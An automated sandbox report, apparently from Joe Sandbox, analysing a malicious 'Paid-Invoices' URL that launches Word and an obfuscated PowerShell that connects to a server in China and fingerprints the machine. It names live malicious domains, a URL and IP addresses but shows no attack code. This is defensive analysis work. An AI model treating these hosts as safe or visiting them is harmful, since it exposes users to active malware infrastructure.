Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Starts Microsoft Word (often done to prevent that the user detects that something wrong)Show sources
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 203.195.212.211 443

Language, Device and Operating System Detection:

barindex
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the installation date of WindowsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 46214 URL: http://royal-tec.com/Paid-Invoices Startdate: 12/02/2018 Architecture: WINDOWS Score: 72 27 www.norsterra.cn 2->27 29 royal-tec.com 2->29 41 Obfuscated command line found 2->41 43 Very long command line found 2->43 45 Document contains an embedded VBA with many randomly named variables 2->45 47 2 other signatures 2->47 9 iexplore.exe 37 63 2->9         started        signatures3 process4 signatures5 53 Browser exploit detected (process start blacklist hit) 9->53 12 WINWORD.EXE 30 17 9->12         started        15 iexplore.exe 15 9->15         started        process6 dnsIp7 55 Obfuscated command line found 12->55 57 Very long command line found 12->57 18 cmd.exe 12->18         started        33 8.8.8.8, 50323, 50900, 51075 GOOGLE-GoogleIncUS United States 15->33 35 royal-tec.com 50.63.111.1, 49164, 49165, 80 AS-26496-GO-DADDY-COM-LLC-GoDaddycomLLCUS United States 15->35 21 ssvagent.exe 6 15->21         started        signatures8 process9 signatures10 37 Obfuscated command line found 18->37 39 Very long command line found 18->39 23 powershell.exe 12 7 18->23         started        process11 dnsIp12 31 www.norsterra.cn 203.195.212.211, 443, 49180 CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa China 23->31 49 System process connects to network (likely due to code injection or exploit) 23->49 51 Powershell connects to network 23->51 signatures13

Simulations

Behavior and APIs

TimeTypeDescription
21:34:48API Interceptor1695x Sleep call for process: iexplore.exe modified from: 60000ms to: 100ms
21:35:18API Interceptor1x Sleep call for process: WINWORD.EXE modified from: 60000ms to: 100ms

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

SourceDetectionCloudLink
royal-tec.com0%virustotalBrowse

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

Dropped Files

No context

Screenshot